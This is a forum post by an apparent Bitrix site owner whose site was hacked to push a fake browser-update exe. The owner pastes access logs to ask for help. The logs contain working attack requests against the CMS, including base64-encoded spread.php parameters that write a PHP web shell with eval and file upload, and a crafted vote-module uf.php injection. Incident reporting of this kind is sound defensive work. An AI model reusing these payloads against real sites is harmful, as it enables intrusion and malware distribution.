The site was hacked. A "captcha" appears saying that the browser is out of date, then a download page for the "new version" opens from our domain. An exe file gets downloaded.
The latest updates had not been installed on the site. It was last updated at the end of last year.
I could not find any rogue files. There are no suspicious files created (or modified) recently. The built-in trojan scanner does not flag anything.
Over the past week the logs show attempts to upload files from the IP 79.137.206.177
Logs for this IP:
Code:
79.137.206.177 - - [03/Feb/2024:06:19:26 +0300 - -] 301 "GET / HTTP/1.1" 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2793.63 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:06:19:27 +0300 - 0.020] 200 "GET / HTTP/1.1" 150417 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2793.63 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:07:47:40 +0300 - -] 301 "GET / HTTP/1.1" 162 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.12 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:07:47:41 +0300 - 0.022] 200 "GET / HTTP/1.1" 150416 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.12 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:07:48:29 +0300 - 0.284] 404 "GET /bitrix/tools/spread.php?state=MD1zeXN0ZW0mMT1lY2hvIFBEOXdhSEFnWldOb2J5QTBNRGszTWpNcU1qQTdhV1lvYldRMUtDUmZRMDlQUzBsRlcyUmRLVDA5SWpFM01ESTRaalE0TjJOaU1tRTRORFl3TnpZME5tUmhNMkZrTXpnM09HVmpJaWw3WldOb2J5SnZheUk3WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSZlVrVlJWVVZUVkZ0cFpGMHBLVHRwWmlna1gxQlBVMVJiSW5Wd0lsMDlQU0oxY0NJcGUwQmpiM0I1S0NSZlJrbE1SVk5iSW1acGJHVWlYVnNpZEcxd1gyNWhiV1VpWFN3a1gwWkpURVZUV3lKbWFXeGxJbDFiSW01aGJXVWlYU2s3ZlgwL1BnPT18YmFzZTY0IC1kfCB0ZWUgLi4vLi4vZjE5NWJmMjVjM2IwLnBocCYyPQ== HTTP/1.1" 151082 "https://***.ru/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.12 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:07:48:30 +0300 - 0.246] 404 "GET /f195bf25c3b0.php HTTP/1.1" 149781 "https://***.ru/bitrix/tools/spread.php?state=MD1zeXN0ZW0mMT1lY2hvIFBEOXdhSEFnWldOb2J5QTBNRGszTWpNcU1qQTdhV1lvYldRMUtDUmZRMDlQUzBsRlcyUmRLVDA5SWpFM01ESTRaalE0TjJOaU1tRTRORFl3TnpZME5tUmhNMkZrTXpnM09HVmpJaWw3WldOb2J5SnZheUk3WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSZlVrVlJWVVZUVkZ0cFpGMHBLVHRwWmlna1gxQlBVMVJiSW5Wd0lsMDlQU0oxY0NJcGUwQmpiM0I1S0NSZlJrbE1SVk5iSW1acGJHVWlYVnNpZEcxd1gyNWhiV1VpWFN3a1gwWkpURVZUV3lKbWFXeGxJbDFiSW01aGJXVWlYU2s3ZlgwL1BnPT18YmFzZTY0IC1kfCB0ZWUgLi4vLi4vZjE5NWJmMjVjM2IwLnBocCYyPQ==" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.12 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:07:48:52 +0300 - 0.215] 404 "GET /bitrix/tools/spread.php?state=MD1maWxlX3B1dF9jb250ZW50cyYxPS4uLy4uL2YxOTViZjI1YzNiMC5waHAmMj08P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbZF0pPT0iMTcwMjhmNDg3Y2IyYTg0NjA3NjQ2ZGEzYWQzODc4ZWMiKXtlY2hvIm9rIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUW2lkXSkpO2lmKCRfUE9TVFsidXAiXT09InVwIil7QGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCRfRklMRVNbImZpbGUiXVsibmFtZSJdKTt9fT8+ HTTP/1.1" 150741 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.12 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:07:48:53 +0300 - 0.216] 404 "GET /f195bf25c3b0.php HTTP/1.1" 149780 "https://***.ru/bitrix/tools/spread.php?state=MD1maWxlX3B1dF9jb250ZW50cyYxPS4uLy4uL2YxOTViZjI1YzNiMC5waHAmMj08P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbZF0pPT0iMTcwMjhmNDg3Y2IyYTg0NjA3NjQ2ZGEzYWQzODc4ZWMiKXtlY2hvIm9rIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUW2lkXSkpO2lmKCRfUE9TVFsidXAiXT09InVwIil7QGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCRfRklMRVNbImZpbGUiXVsibmFtZSJdKTt9fT8+" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2855.12 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:18:56:44 +0300 - -] 301 "GET / HTTP/1.1" 162 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2944.93 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:18:56:45 +0300 - 0.020] 200 "GET / HTTP/1.1" 150559 "-" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2944.93 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:18:56:52 +0300 - 0.253] 404 "GET /f195bf25c3b0.php HTTP/1.1" 149891 "https://***.ru/" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2944.93 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:18:56:53 +0300 - 0.030] 200 "GET /bitrix/tools/composite_data.php HTTP/1.1" 238 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2944.93 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:18:56:53 +0300 - 0.239] 404 "POST /bitrix/tools/vote/uf.php?attachId[ENTITY_TYPE]=CFileUploader&attachId[ENTITY_ID][events][onFileIsStarted][]=CAllAgent&attachId[ENTITY_ID][events][onFileIsStarted][]=Update&attachId[MODULE_ID]=vote&action=vote HTTP/1.1" 150270 "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2944.93 Safari/537.36" "-"
79.137.206.177 - - [03/Feb/2024:23:19:37 +0300 - -] 301 "GET /bitrix/admin/index.php?login=yes HTTP/1.1" 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:46.0) Gecko/20100101 Firefox/46.0" "-"
79.137.206.177 - - [03/Feb/2024:23:19:37 +0300 - 0.106] 200 "GET /bitrix/admin/index.php?login=yes HTTP/1.1" 6489 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:46.0) Gecko/20100101 Firefox/46.0" "-"
79.137.206.177 - - [03/Feb/2024:23:19:47 +0300 - 0.054] 200 "POST /bitrix/admin/index.php?login=yes HTTP/1.1" 220 "https://***.ru/bitrix/admin/index.php?login=yes" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:46.0) Gecko/20100101 Firefox/46.0" "-"
79.137.206.177 - - [04/Feb/2024:04:02:10 +0300 - -] 301 "GET / HTTP/1.1" 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2841.34 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:04:02:10 +0300 - 0.020] 200 "GET / HTTP/1.1" 150416 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2841.34 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:05:08:30 +0300 - -] 301 "GET / HTTP/1.1" 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:05:08:31 +0300 - 0.019] 200 "GET / HTTP/1.1" 150416 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:05:08:35 +0300 - 0.043] 200 "GET /bitrix/tools/composite_data.php HTTP/1.1" 238 "https://***.ru/" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:05:08:35 +0300 - 0.049] 200 "POST /bitrix/tools/html_editor_action.php HTTP/1.1" 0 "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:05:08:38 +0300 - 0.034] 200 "POST /bitrix/tools/html_editor_action.php HTTP/1.1" 0 "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:05:08:42 +0300 - 0.039] 200 "POST /bitrix/tools/html_editor_action.php HTTP/1.1" 0 "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:05:08:42 +0300 - 0.020] 200 "GET / HTTP/1.1" 150424 "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:05:08:43 +0300 - 0.319] 404 "POST /bitrix/tools/accesson.php HTTP/1.1" 149659 "https://***.ru/" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:05:08:43 +0300 - 0.204] 404 "POST /bitrix/tools/f195bf25c3b0.php HTTP/1.1" 149678 "https://***.ru/bitrix/tools/accesson.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2837.17 Safari/537.36" "-"
79.137.206.177 - - [04/Feb/2024:15:20:49 +0300 - -] 301 "GET / HTTP/1.1" 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0" "-"
79.137.206.177 - - [04/Feb/2024:15:20:49 +0300 - 0.019] 200 "GET / HTTP/1.1" 150654 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0" "-"
79.137.206.177 - - [04/Feb/2024:15:21:45 +0300 - 0.296] 404 "GET /bitrix/tools/spread.php?state=MD1zeXN0ZW0mMT1lY2hvIFBEOXdhSEFnWldOb2J5QTBNRGszTWpNcU1qQTdhV1lvYldRMUtDUmZRMDlQUzBsRlcyUmRLVDA5SWpFM01ESTRaalE0TjJOaU1tRTRORFl3TnpZME5tUmhNMkZrTXpnM09HVmpJaWw3WldOb2J5SnZheUk3WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSZlVrVlJWVVZUVkZ0cFpGMHBLVHRwWmlna1gxQlBVMVJiSW5Wd0lsMDlQU0oxY0NJcGUwQmpiM0I1S0NSZlJrbE1SVk5iSW1acGJHVWlYVnNpZEcxd1gyNWhiV1VpWFN3a1gwWkpURVZUV3lKbWFXeGxJbDFiSW01aGJXVWlYU2s3ZlgwL1BnPT18YmFzZTY0IC1kfCB0ZWUgLi4vLi4vZjE5NWJmMjVjM2IwLnBocCYyPQ== HTTP/1.1" 151081 "https://***.ru/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0" "-"
9.137.206.177 - - [04/Feb/2024:15:21:46 +0300 - 0.248] 404 "GET /f195bf25c3b0.php HTTP/1.1" 149784 "https://***.ru/bitrix/tools/spread.php?state=MD1zeXN0ZW0mMT1lY2hvIFBEOXdhSEFnWldOb2J5QTBNRGszTWpNcU1qQTdhV1lvYldRMUtDUmZRMDlQUzBsRlcyUmRLVDA5SWpFM01ESTRaalE0TjJOaU1tRTRORFl3TnpZME5tUmhNMkZrTXpnM09HVmpJaWw3WldOb2J5SnZheUk3WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSZlVrVlJWVVZUVkZ0cFpGMHBLVHRwWmlna1gxQlBVMVJiSW5Wd0lsMDlQU0oxY0NJcGUwQmpiM0I1S0NSZlJrbE1SVk5iSW1acGJHVWlYVnNpZEcxd1gyNWhiV1VpWFN3a1gwWkpURVZUV3lKbWFXeGxJbDFiSW01aGJXVWlYU2s3ZlgwL1BnPT18YmFzZTY0IC1kfCB0ZWUgLi4vLi4vZjE5NWJmMjVjM2IwLnBocCYyPQ==" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0" "-"
79.137.206.177 - - [04/Feb/2024:15:21:47 +0300 - 0.227] 404 "GET /bitrix/tools/spread.php?state=MD1maWxlX3B1dF9jb250ZW50cyYxPS4uLy4uL2YxOTViZjI1YzNiMC5waHAmMj08P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbZF0pPT0iMTcwMjhmNDg3Y2IyYTg0NjA3NjQ2ZGEzYWQzODc4ZWMiKXtlY2hvIm9rIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUW2lkXSkpO2lmKCRfUE9TVFsidXAiXT09InVwIil7QGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCRfRklMRVNbImZpbGUiXVsibmFtZSJdKTt9fT8+ HTTP/1.1" 150751 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0" "-"
79.137.206.177 - - [04/Feb/2024:15:21:47 +0300 - 0.223] 404 "GET /f195bf25c3b0.php HTTP/1.1" 149784 "https://***.ru/bitrix/tools/spread.php?state=MD1maWxlX3B1dF9jb250ZW50cyYxPS4uLy4uL2YxOTViZjI1YzNiMC5waHAmMj08P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbZF0pPT0iMTcwMjhmNDg3Y2IyYTg0NjA3NjQ2ZGEzYWQzODc4ZWMiKXtlY2hvIm9rIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUW2lkXSkpO2lmKCRfUE9TVFsidXAiXT09InVwIil7QGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCRfRklMRVNbImZpbGUiXVsibmFtZSJdKTt9fT8+" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0" "-"
79.137.206.177 - - [05/Feb/2024:01:57:18 +0300 - -] 301 "GET / HTTP/1.1" 162 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Win64; x64; Trident/6.0)" "-"
79.137.206.177 - - [05/Feb/2024:01:57:18 +0300 - 0.018] 200 "GET / HTTP/1.1" 151283 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 5.1; Win64; x64; Trident/6.0)" "-"
All the logs since the 28th that I found:
Code:
127.0.0.1 - - [28/Jan/2024:11:45:07 +0300] "POST /bitrix/tools/f195bf25c3b0.php HTTP/1.0" 404 1280668 "https://***.ru/bitrix/tools/accesson.php" "Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2649.67 Safari/537.36"
127.0.0.1 - - [28/Jan/2024:12:05:43 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2914.96 Safari/537.36"
127.0.0.1 - - [28/Jan/2024:12:05:43 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2914.96 Safari/537.36"
127.0.0.1 - - [28/Jan/2024:12:05:43 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2914.96 Safari/537.36"
127.0.0.1 - - [28/Jan/2024:12:05:43 +0300] "GET / HTTP/1.0" 200 1291401 "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2914.96 Safari/537.36"
127.0.0.1 - - [28/Jan/2024:12:05:44 +0300] "POST /accesson.php HTTP/1.0" 404 1280775 "https://***.ru/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2914.96 Safari/537.36"
127.0.0.1 - - [28/Jan/2024:12:05:44 +0300] "POST /f195bf25c3b0.php HTTP/1.0" 404 1280807 "https://***.ru/accesson.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2914.96 Safari/537.36"
127.0.0.1 - - [29/Jan/2024:02:15:50 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281052 "https://***.ru/bitrix/tools/spread.php?state=MD1zeXN0ZW0mMT1lY2hvIFBEOXdhSEFnWldOb2J5QTBNRGszTWpNcU1qQTdhV1lvYldRMUtDUmZRMDlQUzBsRlcyUmRLVDA5SWpFM01ESTRaalE0TjJOaU1tRTRORFl3TnpZME5tUmhNMkZrTXpnM09HVmpJaWw3WldOb2J5SnZheUk3WlhaaGJDaGlZWE5sTmpSZlpHVmpiMlJsS0NSZlVrVlJWVVZUVkZ0cFpGMHBLVHRwWmlna1gxQlBVMVJiSW5Wd0lsMDlQU0oxY0NJcGUwQmpiM0I1S0NSZlJrbE1SVk5iSW1acGJHVWlYVnNpZEcxd1gyNWhiV1VpWFN3a1gwWkpURVZUV3lKbWFXeGxJbDFiSW01aGJXVWlYU2s3ZlgwL1BnPT18YmFzZTY0IC1kfCB0ZWUgLi4vLi4vZjE5NWJmMjVjM2IwLnBocCYyPQ==" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [29/Jan/2024:02:15:51 +0300] "GET /bitrix/tools/spread.php?state=MD1maWxlX3B1dF9jb250ZW50cyYxPS4uLy4uL2YxOTViZjI1YzNiMC5waHAmMj08P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbZF0pPT0iMTcwMjhmNDg3Y2IyYTg0NjA3NjQ2ZGEzYWQzODc4ZWMiKXtlY2hvIm9rIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUW2lkXSkpO2lmKCRfUE9TVFsidXAiXT09InVwIil7QGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCRfRklMRVNbImZpbGUiXVsibmFtZSJdKTt9fT8+ HTTP/1.0" 404 1283509 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [29/Jan/2024:02:15:53 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281052 "https://***.ru/bitrix/tools/spread.php?state=MD1maWxlX3B1dF9jb250ZW50cyYxPS4uLy4uL2YxOTViZjI1YzNiMC5waHAmMj08P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbZF0pPT0iMTcwMjhmNDg3Y2IyYTg0NjA3NjQ2ZGEzYWQzODc4ZWMiKXtlY2hvIm9rIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUW2lkXSkpO2lmKCRfUE9TVFsidXAiXT09InVwIil7QGNvcHkoJF9GSUxFU1siZmlsZSJdWyJ0bXBfbmFtZSJdLCRfRklMRVNbImZpbGUiXVsibmFtZSJdKTt9fT8+" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [29/Jan/2024:10:31:17 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281053 "https://***.ru/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.79 Safari/537.36"
127.0.0.1 - - [29/Jan/2024:10:31:18 +0300] "POST / HTTP/1.0" 200 1300411 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.79 Safari/537.36"
127.0.0.1 - - [29/Jan/2024:10:31:19 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281053 "https://***.ru/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.79 Safari/537.36"
127.0.0.1 - - [29/Jan/2024:14:26:29 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281053 "https://***.ru/" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
127.0.0.1 - - [29/Jan/2024:14:26:29 +0300] "GET /bitrix/tools/composite_data.php HTTP/1.0" 200 317 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
127.0.0.1 - - [29/Jan/2024:14:26:30 +0300] "POST /bitrix/tools/vote/uf.php?attachId[ENTITY_TYPE]=CFileUploader&attachId[ENTITY_ID][events][onFileIsStarted][]=CAllAgent&attachId[ENTITY_ID][events][onFileIsStarted][]=Update&attachId[MODULE_ID]=vote&action=vote HTTP/1.0" 404 1282343 "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (Windows NT 6.2; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
127.0.0.1 - - [29/Jan/2024:20:07:33 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
127.0.0.1 - - [29/Jan/2024:20:07:33 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
127.0.0.1 - - [29/Jan/2024:20:07:34 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
127.0.0.1 - - [29/Jan/2024:20:07:34 +0300] "POST /bitrix/tools/accesson.php HTTP/1.0" 404 1280636 "https://***.ru/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
127.0.0.1 - - [29/Jan/2024:20:07:36 +0300] "POST /bitrix/tools/f195bf25c3b0.php HTTP/1.0" 404 1280668 "https://***.ru/bitrix/tools/accesson.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"
127.0.0.1 - - [29/Jan/2024:21:03:53 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2802.54 Safari/537.36"
127.0.0.1 - - [29/Jan/2024:21:03:54 +0300] "GET / HTTP/1.0" 200 1291394 "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2802.54 Safari/537.36"
127.0.0.1 - - [29/Jan/2024:21:03:54 +0300] "POST /accesson.php HTTP/1.0" 404 1280774 "https://***.ru/" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2802.54 Safari/537.36"
127.0.0.1 - - [29/Jan/2024:21:03:55 +0300] "POST /f195bf25c3b0.php HTTP/1.0" 404 1280806 "https://***.ru/accesson.php" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2802.54
127.0.0.1 - - [31/Jan/2024:17:55:48 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281052 "https://***.ru/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [31/Jan/2024:17:56:05 +0300] "POST / HTTP/1.0" 200 1300410 "https://***.ru/f195bf25c3b0.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [31/Jan/2024:17:56:14 +0300] "GET /f195bf25c3b0.php HTTP/1.0" 404 1281052 "https://***.ru/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [01/Feb/2024:08:49:01 +0300] "GET / HTTP/1.0" 200 1291258 "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [01/Feb/2024:08:49:01 +0300] "POST /bitrix/tools/accesson.php HTTP/1.0" 404 1281313 "https://***.ru/" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [01/Feb/2024:08:49:02 +0300] "POST /bitrix/tools/f195bf25c3b0.php HTTP/1.0" 404 1281345 "https://***.ru/bitrix/tools/accesson.php" "Mozilla/5.0 (X11; Linux i686 on x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [01/Feb/2024:09:21:18 +0300] "GET / HTTP/1.0" 200 1291305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [01/Feb/2024:09:21:20 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/composite_data.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [01/Feb/2024:09:21:21 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [01/Feb/2024:09:21:21 +0300] "POST /bitrix/tools/html_editor_action.php HTTP/1.0" 200 - "https://***.ru/bitrix/tools/html_editor_action.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101
127.0.0.1 - - [01/Feb/2024:09:21:24 +0300] "POST /f195bf25c3b0.php HTTP/1.0" 404 1280810 "https://***.ru/accesson.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0"
127.0.0.1 - - [02/Feb/2024:01:03:57 +0300] "GET / HTTP/1.0" 200 1290586 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
